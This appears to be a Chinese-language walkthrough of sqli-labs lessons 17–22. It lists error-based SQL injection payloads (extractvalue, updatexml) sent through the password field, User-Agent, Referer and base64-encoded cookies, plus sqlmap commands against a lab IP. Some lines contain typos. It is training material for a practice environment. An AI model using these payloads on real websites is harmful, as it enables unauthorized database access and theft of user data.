17.
观察页面发现是一个用来更改用户密码的页面,页面中出现了用户Dhakkan
user输入Dhakkan passs输入1发现成功找注入点
先在user尝试,发现不管输入什么都失败在pass中尝试注入
在pass中输入1‘
报错注入
1' and extractvalue(1,concat(0x5c,database()))#
1' and updatexml(1,concat(0x7e,database(),0x7e),1)#
1' and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security')))#
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
1' and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))#
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
1' and extractvalue(1,concat(0x5c,(select group_concat(username) from (select username from users)zx)))#
1' and updatexml(1,concat(0x7e,(select group_concat(username) from (select username from users)zx),0x7e),1)#这里的select group_concat(username) from (select username from users)zx
后面的(select username from users)zx代表将select username from users的结果放在zx这个表中目的是为了能在外部查询中引用他
1' and extractvalue(1,concat(0x5c,(select group_oncat(username) from security.users)))#
因为是update的操作使用
1' and extractvalue(1,concat(0x5c,(select group_oncat(username) from security.users)))#
会报错’
sqlmap 这几个post都一样通过bp获取
18.
使用用户Dhakkan密码1
发现返回ua头对ua头进行注入
我们可以看到因为我们注入的ua在()里面但是通过)#的方法不能成功所以我们在最后要加上‘所以我们使用and '1' ='1来闭合’
' and extractvalue(1,concat(0x5c,database())) and '1'='1
' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
' and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) and '1'='1
' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) and '1'='1
' and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) and '1'='1
' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and '1'='1
' and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))) and '1'='1
' and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1) and '1'='1
报错注入返回的内容有限所以可以用limit分别输出 group_concat在这里不能完成输入所有内容
sqlamp
sqlmap -u "http://192.168.1.200:86/Less-18/" --batch --user-agent="1" --dbs --data="uname=Dhakkan&passwd=1" --level=3 --risk=319.
输入Dhakkan和1
这里出现了referer信息,从referer处注入
' and extractvalue(1,concat(0x5c,database())) and'1'='1
' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
' and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) and '1'='1
' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) and '1'='1
' and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) and '1'='1
' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and '1'='1
' and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))) and '1'='1
' and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1) and '1'='1
sqlmap
sqlmap -u "http://192.168.1.200:86/Less-19/" --referer="1" --data="uname=Dhakkan&passwd=1" --batch --dbs --level=3 --risk=320.
这里显示cookie要有uname参数
' and extractvalue(1,concat(0x5c,database())) and '1'='1
' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
' and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security')))and '1'='1
'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)and '1'='1
' and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))and '1'='1
' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and '1'='1
' and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))) and '1'='1
' and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1) and '1'='1
21.
我们发现还是显示cookie不是通过了base64加密
Dhakkan' and extractvalue(1,concat(0x5c,database())) and '1'='1
RGhha2thbicgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDVjLGRhdGFiYXNlKCkpKSBhbmQgJzEnPScx
Dhakkan'and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
RGhha2thbidhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSwxKSBhbmQgJzEnPScx
Dhakkan'and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) and '1'='1
RGhha2thbidhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknKSkpIGFuZCAnMSc9JzE=
Dhakkan' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) and '1'='1
RGhha2thbicgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JyksMHg3ZSksMSkgYW5kICcxJz0nMQ==
Dhakkan' and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))) and '1'='1
RGhha2thbicgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDVjLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGFuZCB0YWJsZV9uYW1lPSd1c2VycycpKSkgYW5kICcxJz0nMQ==
Dhakkan' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and '1'='1
RGhha2thbicgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGFuZCB0YWJsZV9uYW1lPSd1c2VycycpLDB4N2UpLDEpIGFuZCAnMSc9JzE=
Dhakkan'and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))) and '1'='1
RGhha2thbidhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUpIGZyb20gc2VjdXJpdHkudXNlcnMpKSkgYW5kICcxJz0nMQ==
Dhakkan' and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1) and '1'='1
RGhha2thbicgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSBmcm9tIHNlY3VyaXR5LnVzZXJzKSwweDdlKSwxKSBhbmQgJzEnPScx
22.
这里的单引号换成双引号
Dhakkan" and extractvalue(1,concat(0x5c,database())) and "1"="1
RGhha2thbiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDVjLGRhdGFiYXNlKCkpKSBhbmQgIjEiPSIx
Dhakkan" and updatexml(1,concat(0x7e,database(),0x7e),1)and "1"="1
RGhha2thbiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCksMHg3ZSksMSlhbmQgIjEiPSIx
Dhakkan"and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) and "1"="1
RGhha2thbiJhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknKSkpIGFuZCAiMSI9IjE=
Dhakkan"and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) and "1"="1
RGhha2thbiJhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknKSwweDdlKSwxKSBhbmQgIjEiPSIx
Dhakkan"and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) and "1"="1
RGhha2thbiJhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSJzZWN1cml0eSIgYW5kIHRhYmxlX25hbWU9InVzZXJzIikpKSBhbmQgIjEiPSIx
Dhakkan"and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and "1"="1
RGhha2thbiJhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgYW5kIHRhYmxlX25hbWU9J3VzZXJzJyksMHg3ZSksMSkgYW5kICIxIj0iMQ==
Dhakkan" and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))) and "1"="1
RGhha2thbiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDVjLChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSBmcm9tIHNlY3VyaXR5LnVzZXJzKSkpIGFuZCAiMSI9IjE=
Dhakkan" and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1) and "1"="1
RGhha2thbiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSBmcm9tIHNlY3VyaXR5LnVzZXJzKSwweDdlKSwxKSBhbmQgIjEiPSIx
